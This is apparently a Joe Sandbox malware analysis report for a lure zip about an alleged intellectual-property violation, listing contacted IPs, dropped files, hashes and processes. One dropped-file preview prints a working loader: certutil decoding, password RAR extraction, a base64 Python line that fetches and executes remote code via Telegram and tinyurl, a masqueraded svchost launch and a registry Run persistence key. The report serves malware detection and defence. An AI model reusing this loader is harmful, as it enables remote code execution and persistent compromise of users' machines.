http://mupdf.comMuPDFpdf	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.winimage.com/zLibDllbad	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.winimage.com/zLibDll	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://blog.kowalczyk.infoKrzysztof	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high
http://www.haihaisoft.comSumatraPDF	Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
142.250.65.227	unknown	United States	15169	GOOGLEUS	false
162.125.13.15	unknown	United States	19679	DROPBOXUS	false
142.251.40.174	unknown	United States	15169	GOOGLEUS	false
104.18.111.161	unknown	United States	13335	CLOUDFLARENETUS	false
162.125.13.18	unknown	United States	19679	DROPBOXUS	false
142.251.35.164	unknown	United States	15169	GOOGLEUS	false
142.250.176.195	unknown	United States	15169	GOOGLEUS	false
172.253.122.84	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1649464
Start date and time:	2025-03-26 19:48:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://tinyurl.com/yep5ph9f
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.evad.win@38/11@0/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 95 Number of non-executed functions: 53

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: https://tinyurl.com/yep5ph9f

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PEM certificate
Category:	dropped
Size (bytes):	21693134
Entropy (8bit):	6.044410053618675
Encrypted:	false
SSDEEP:	49152:ZNBdUuKNx2GNgOrbZpmco2rc2M2TfwANfTBPb1xCGQTOrPOUuxQqiy8uGLj9tY4z:G
MD5:	FDEA631DCD5649014781E4975F0DF4BE
SHA1:	C9A5740C9EFB7FD5D0D594C16056EF2521C164A2
SHA-256:	D04FF4ABB797FF8D4FFA4FFCEE283F005DD8054EC6A6C105327C251B5F894777
SHA-512:	E9ACE6E1BACFF50A4D37D44EB8CC49E94EE4CFE8F23EF02DF8142B1F4D5F2452C5C21E54AD15311B53FEC709C93C4274332DAC6C59CD4C5D1356EE3D00B3017A
Malicious:	false
Reputation:	low
Preview:	-----BEGIN CERTIFICATE-----..UmFyIRoHAQCvjitTIQQAAAEPmcj87XKxzfFcg315FEpL91ZawmsA7e8UJ309FtYy..FnzHaA57mY3GD2gCE1rFZ6pObU0Vc+pCH7LThfmWq66/r4y9UybrDqBzv37chI38..XAJYxOYl9XRgCv+aYjs/GAITxlriFpFhThsJVThKnCvte+5VGYzW8xGSX80dupJ7..UugXjUMwihmV7Uq7tzaf3OgceoVf1VGIWbWh+thjWvKY8ZHN1jMtLpw/LljI7BoA..r1qYUosETA7+fXTIE4psKGQnsrZ6RPw6ez3CTAhve17DsC7NWV9ChSRagTjee4zL..CCA+ijOpFIqFUNfrnDsIxZplWZ2/i46twyYNc02JU1/1EYwvnYZNIRhEp/GsIevL..nRBKPcnudLGIhm+HdADz+1+61sRUj7F3SBVSL7bgCyaBfojq1mU1a8qMohErGgPu..Eqt27iz5q4Q6t/8Af8dzS1lp9a/7Y+LGDWvMWDUJJQKjtasEDPPz6+M5y/1scqgQ..e9xqxJBZs8zkm2MKhl90gkx9zUwE+6fNUUHtQ2SPpzoPOHgr15IFzmOwGGYYgP2E..MgSU4KbYjgtsRl7401psCZXcYqdgWpeSDSrRhyJgDkspjLO5vVnhYlAUOid9Eazu..KMKFBvX+UsDvCZl3yCx4bhEbCRGJLSBAWPibuhO5/EkhUq1gp3n87UOj0M9ZFc5v..4Zq4dfVwiwhorzyo8dgP1inMdDdMRZkb1gA2dIUqGFD0I1FjHtG1oBxQvC4wDa6I..mGHpMmCvuKZTC4dpNp2iDUIGZh6JusHfMjrFE+q2zswlMgYv0Crdbo/WnUtDu/5z..LiUkKAjeppwHQtfNtcwm4zbi4AFjMbhJThPbz2+yxdeqcMNNW1QHv4XOA8vDgegh..Aggv1O8dsQ5pjva3raWDSbJKKTYNqUBis1o/S4crFKfXFcu

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Evidence.??d??o??c??x

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with very long lines (465), with CRLF line terminators
Category:	dropped
Size (bytes):	1128
Entropy (8bit):	5.917020059198988
Encrypted:	false
SSDEEP:	24:3siHZmW0zQOrmDr9VaetCq4BmmWCAAmWpVgIrEmWS08u:x5mW0zQOrmtVIZmmW1AmWpyMEmWXN
MD5:	45FC438AA47555C27661972BBCEFB3C0
SHA1:	850F150DDEBE23679BA8EC7A3332D0C085EC02ED
SHA-256:	4353E0B55D4698F2A6EDDC2A8EC53B22548EF47F5010732163DFB241FB97414F
SHA-512:	2E4058EB777FA8ADCEC60F1B2345CC52A5D7B90BB9F6C8CA6AA4ABC2F789E06E2C034DED6C1691A34BA5822C2B4E4729D93B89C46BC0B886A824979FCDE1951A
Malicious:	false
Reputation:	low
Preview:	cd /d "%~dp0"..start /max "" "Documents.pdf"..certutil -decode Documents.pdf LX8bzeZTzF5XSONpDC.rar..mkdir C:\Users\Public\LX8bzeZTzF5XSONpDC..images.png x -pS8SKXaOudHX78CnCmjawuXJAXwNAzVeK -inul -y LX8bzeZTzF5XSONpDC.rar C:\Users\Public\LX8bzeZTzF5XSONpDC..echo ___________ = 'https://t.me/MEXX6toHNBot'; exec(__import__('base64').b64decode('aW1wb3J0IHJlcXVlc3RzLCByZTsgZXhlYyhyZXF1ZXN0cy5nZXQocmVxdWVzdHMuaGVhZChmJ2h0dHBzOi8vdGlueXVybC5jb20ve21hdGNoLmdyb3VwKDEpfScsIGFsbG93X3JlZGlyZWN0cz1UcnVlKS51cmwpLnRleHQpIGlmIChtYXRjaCA6PSByZS5zZWFyY2gocic8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iIGNvbnRlbnQ9IihbXiJdKykiJywgcmVxdWVzdHMuZ2V0KF9fX19fX19fX19fKS50ZXh0KSkgZWxzZSBOb25lCg==')) >> C:\Users\Public\LX8bzeZTzF5XSONpDC\Photos..start "" /min "C:\Users\Public\LX8bzeZTzF5XSONpDC\svchost.exe" C:\Users\Public\LX8bzeZTzF5XSONpDC\Photos..reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update Service" /t REG_SZ /d "cmd.exe /c start \"\" /min \"C:\Users\Public\LX8bzeZTzF5XSONpDC\s

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	644184
Entropy (8bit):	6.451035547006443
Encrypted:	false
SSDEEP:	12288:XxGICLbJbw9eVSeeUpG8dux9VF7qDtJQcBswj1POW4ddjh:mdbmeVSowh3VdqD/owpPODdjh
MD5:	01F28B85ABF1993B7B14B3D15346F2E8
SHA1:	DEC708FE5E44E77E1737C51B7A4A0422994D1F6F
SHA-256:	B550465B9739594B6A193A16FA33F3CDDE3ECD4773FEB93E68C00FDBCF5EB8B8
SHA-512:	DEA58D71EC8A0BF3BCBAA78CF54C957FA218F1842FE3FCB9C40D05B0C1E9A8DBF1D486036AD0EB04741E15149F93AFEC1B4878A0CD6B6A2B92FB9D00363AA14A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............\|...\|...\|..Q....\|..Q...f\|..Q....\|....b..\|..e....\|..e....\|..e....\|..e....\|....v..\|...\|..^\|..k...\|..k....\|..k....\|..Rich.\|..................PE..d.....td.........."....!. ...*.................@....................................d.....`.................................................4w..........H........F......XH......x.......T.......................(.......@............0...............................text............ .................. ..`.rdata..@Z...0...\...$..............@..@.data...l........4..................@....pdata...F.......H..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..x...........................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6365288
Entropy (8bit):	6.974813635942095
Encrypted:	false
SSDEEP:	98304:VZQIM+/nv/CDoAkYwpAa5ge1zZ/jtdZwUkQ:bJCKlA2VKUz
MD5:	4864A55CFF27F686023456A22371E790
SHA1:	6ED30C0371FE167D38411BFA6D720FCDCACC4F4C
SHA-256:	08C7FB6067ACC8AC207D28AB616C9EA5BC0D394956455D6A3EECB73F8010F7A2
SHA-512:	4BD3A16435CCA6CE7A7AA829EB967619A8B7C02598474E634442CFFC55935870D54D844A04496BF9C7E8C29C40FAE59AC6EB39C8550C091D06A28211491D0BFB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N..HN..HN..Hih.H\..HP.BHF..H..PHF..HG.SHu..HG.BH...HN..HQ..HG.EH...Hih.Hk..HN..H%..HG.OHw..HP.RHO..HG.WHO..HRichN..H........................PE..L...$7.Z.................z,...4...............,...@...........................b......a......................................W.\|....._...............a.h...........@.,.............................H.U.@.............,.....\.W.@....................text...\y,......z,................. ..`.rdata...]+...,..^+..~,.............@..@.data...\.....W..<....W.............@....rsrc........._.......^.............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\vcruntime140.dll

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91272
Entropy (8bit):	6.949159838323346
Encrypted:	false
SSDEEP:	1536:fDrhkJFRuE16nq2QoVj8gMaPTz7WHqQWZwg+AnecbGKjj9M9zfk/AJYpz7w:LdkpQMaPDWgD+wecbGkjk4vpnw
MD5:	4F0F5649FFC133FA626589ED6111C30E
SHA1:	65ACBA59815E6440C06C55C4457C601B5B22B0AD
SHA-256:	A088131E8EB4E2178789AF49B646AB463CF9A1F48DA51698448206DF21DB5C95
SHA-512:	526432F06A9105F29FD8E9C1814B5CA82880337A2DE0149ED9A15E250DA607047331C299FFFB41CB7486A4D61C543F459BF073E1187637FDED487019B5B0A04E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tm<[..o[..o[..o.m.nY..oRm.oP..o[..or..o...nM..o...nG..o...nH..o...nZ..o...oZ..o...nZ..oRich[..o........................PE..L....B............"!...(.....................................................P............@A................................. .......0...................P...@.. ....$..T............................#..@............ ...............................text............................... ..`.data...\...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.. ....@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\version.dll

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	106966016
Entropy (8bit):	7.999998173226792
Encrypted:	true
SSDEEP:
MD5:	8CDF9A374B8451764C5747CDB5078987
SHA1:	5A49164750E327CC82B4B72EBADC9D8A46B10920
SHA-256:	282C1A5D33E30FB6C8A9EFE78BE833786376CF8F8BFD04D8047B96FF67914B59
SHA-512:	ED825FDE2745F76605D4A63CF11D7B9D23CC455589CD7624FD60938D44D8C81F8C49CFE2827516205157741198D3C205F216848E1F8E76D93BDD66D3F153A15E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%w._D.._D.._D..V<..[D..O...]D..O...^D..O...UD..O...UD...<..\D.._D..vD......]D......^D......^D.._D..^D......^D..Rich_D..........................PE..L...\..g...........!...).....................0...............................p............@..........................6.......6..d....P..P....................`......p2..8............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...$....@......."..............@....rsrc...P....P.......$..............@..@.reloc.......`.......*..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\unarchiver.log

Download File

Process:	C:\Windows\SysWOW64\unarchiver.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	modified
Size (bytes):	3648
Entropy (8bit):	5.344786537054487
Encrypted:	false
SSDEEP:	48:w+9suGfGbfGfGpJGoGfGpyjVMGbVGljVMGHG2GfGGGfGpGsG/Gfcb2pwrio5o7xl:wtXVbqV+MGUoNJWvY
MD5:	B5185650DF89AF448D2C54CB5CB5ECCB
SHA1:	52DAFDCE1B833CDEC90884114FD2021B7FF3602E
SHA-256:	78A53FA7065BFA9BAED668CD737108246B724DDAB904CCC23BF315AE4268A897
SHA-512:	6BE2809F936F892144D7B3DA1033F2E441A7FE79BEC1B012CE2F4032CE0FA97386A50E9B09C384C3ACA1A91DC0E1EA2A2950A6465A718DDD4D47393C154A1F43
Malicious:	false
Reputation:	low
Preview:	03/26/2025 2:50 PM: Unpack: C:\Users\user\Downloads\Ozn.men._o_zji.t.n._poru.en._pr.v_du.evn.ho_vlastnictv._.zip..03/26/2025 2:50 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka..03/26/2025 2:50 PM: Received from standard out: ..03/26/2025 2:50 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..03/26/2025 2:50 PM: Received from standard out: ..03/26/2025 2:50 PM: Received from standard out: Scanning the drive for archives:..03/26/2025 2:50 PM: Received from standard out: 1 file, 126856514 bytes (121 MiB)..03/26/2025 2:50 PM: Received from standard out: ..03/26/2025 2:50 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\Ozn.men._o_zjisten._porusen._pr.v_dusevn.ho_vlastnictv._.zip..03/26/2025 2:50 PM: Received from standard out: --..03/26/2025 2:50 PM: Received from standard out: Path = C:\Users\user\Downloads\Ozn.men._o_zjisten._porusen._pr.v_dusevn.ho_vlastnic

C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	15489
Entropy (8bit):	7.9726544836440345
Encrypted:	false
SSDEEP:	384:O+lnDvM09xdTymK4nn2+1mpgMiI4SoirYH:OonTM09TyEhIgM6i0H
MD5:	0321878504CAB5B182F327DD096A7299
SHA1:	E48CBC5E2E67818E811ECF23B6924593C02387BE
SHA-256:	D073C8820C996C8DF0F652FF0BF9FCC194D095E9BA6E7F5FF67E0C4A952C0A98
SHA-512:	615E85238AC59CE20223C257FB611CCE3E857F85324F19BC6CE200AB6652E1E26AB404A6EFA67CF64C58C29468895B9426F2E88D839B4828423F1EC0E6D36ED7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ZipBomb, Description: Yara detected ZipBomb, Source: C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp, Author: Joe Security
Reputation:	low
Preview:	PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.\|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO........7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7........8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h\|.px,,PC.....V..X.p\|..8...~...e.......$p....56.......{........(........l.J0.+\|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..\|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..

C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	126856514
Entropy (8bit):	7.999887962197239
Encrypted:	true
SSDEEP:
MD5:	7C69DB1F867B4D25B181E0970381EAF2
SHA1:	CDA2E3CA67D905B070932EA99E57D9BC49BEC812
SHA-256:	D988FF4175D459F6960C8FA05DBEBF9277B63AD744860B4C3A54A81B7C90FA21
SHA-512:	234528EA595FE35C2D9AD203EDE49C335D7184AC330ED25993039F75C7E0F2B8152FAEC745754A253C26AF17ACCCDFE413B401492B9878426F623942B440B5C1
Malicious:	false
Reputation:	low
Preview:	PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.\|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO........7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7........8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h\|.px,,PC.....V..X.p\|..8...~...e.......$p....56.......{........(........l.J0.+\|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..\|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..

C:\Users\user\Downloads\Ozn.men._o_zjiat.n._poruaen._pr.v_duaevn.ho_vlastnictv._.zip (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	126856514
Entropy (8bit):	7.999887962197239
Encrypted:	true
SSDEEP:
MD5:	7C69DB1F867B4D25B181E0970381EAF2
SHA1:	CDA2E3CA67D905B070932EA99E57D9BC49BEC812
SHA-256:	D988FF4175D459F6960C8FA05DBEBF9277B63AD744860B4C3A54A81B7C90FA21
SHA-512:	234528EA595FE35C2D9AD203EDE49C335D7184AC330ED25993039F75C7E0F2B8152FAEC745754A253C26AF17ACCCDFE413B401492B9878426F623942B440B5C1
Malicious:	true
Reputation:	low
Preview:	PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.\|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO........7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7........8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h\|.px,,PC.....V..X.p\|..8...~...e.......$p....56.......{........(........l.J0.+\|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..\|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..

C:\Users\user\Downloads\Ozn.men._o_zjiat.n._poruaen._pr.v_duaevn.ho_vlastnictv._.zip.crdownload (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	15489
Entropy (8bit):	7.9726544836440345
Encrypted:	false
SSDEEP:	384:O+lnDvM09xdTymK4nn2+1mpgMiI4SoirYH:OonTM09TyEhIgM6i0H
MD5:	0321878504CAB5B182F327DD096A7299
SHA1:	E48CBC5E2E67818E811ECF23B6924593C02387BE
SHA-256:	D073C8820C996C8DF0F652FF0BF9FCC194D095E9BA6E7F5FF67E0C4A952C0A98
SHA-512:	615E85238AC59CE20223C257FB611CCE3E857F85324F19BC6CE200AB6652E1E26AB404A6EFA67CF64C58C29468895B9426F2E88D839B4828423F1EC0E6D36ED7
Malicious:	false
Reputation:	low
Preview:	PK..........sW.}gBW`..,`.....version.dll..eX]M. .o..............\C...[p........={..~.}.o.\|..8.5.Tw.tuuUw.^..........@xy..Z...0..wA........p.$-`..$..6n..NV.&..f&..N.......6...Jj..N...HH........0....4.c....R7...k.;g....i....-&?......yO........7o..O.....Um.A....,...A.......m..I...i..@........@`...>8.......8...W.0.. T...........-.......(...c...........K-...!....<....;..A.. ....w!....jn.n......vD ..W..y......!..@.....\7........8..F...........G..r...S..J..8....?.F.I..]....-..........`..X.!_._.....#/.....(.=.?..e..h\|.px,,PC.....V..X.p\|..8...~...e.......$p....56.......{........(........l.J0.+\|i*..Q~Y...........0E ..w#...P.b.w...l...`...._p.....?.$.x>B...P....P....#w..n.W._.PA...D.Z.8.._..\|~]..;.H@....l...:.....)...[....3.?..)....#7...)........?dk..e`k..M..Z.JX.p..................m...'......2...~.G...A'...2Z.\8..\.(..$........8X..S.c....`!...wr.?=...........:=V.1.....z..N...@..[..1.....c..6`...}L..1a....t.QC.Q.(..@..."P..H.-.u...........`z....b.8....(Jb..

Static File Info

⊘No static file info

File Icon


Icon Hash:	00b29a8e86828200

• chrome.exe
• chrome.exe
• chrome.exe
• unarchiver.exe
• 7za.exe
• conhost.exe
• cmd.exe
• conhost.exe
• Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
• unarchiver.exe
• 7za.exe
• conhost.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe
• unarchiver.exe
• 7za.exe
• conhost.exe
• cmd.exe
• conhost.exe
• Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
• unarchiver.exe
• 7za.exe
• conhost.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• chrome.exe
• chrome.exe
• chrome.exe
• unarchiver.exe
• 7za.exe
• conhost.exe
• cmd.exe
• conhost.exe
• Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
• unarchiver.exe
• 7za.exe
• conhost.exe

Click to jump to process

Target ID:	1
Start time:	14:49:22
Start date:	26/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:49:27
Start date:	26/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	14:49:33
Start date:	26/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/yep5ph9f"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:50:02
Start date:	26/03/2025
Path:	C:\Windows\SysWOW64\unarchiver.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
Imagebase:	0xcf0000
File size:	12'800 bytes
MD5 hash:	16FF3CC6CC330A08EED70CBC1D35F5D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:50:03
Start date:	26/03/2025
Path:	C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
Imagebase:	0xc0000
File size:	289'792 bytes
MD5 hash:	77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:50:03
Start date:	26/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
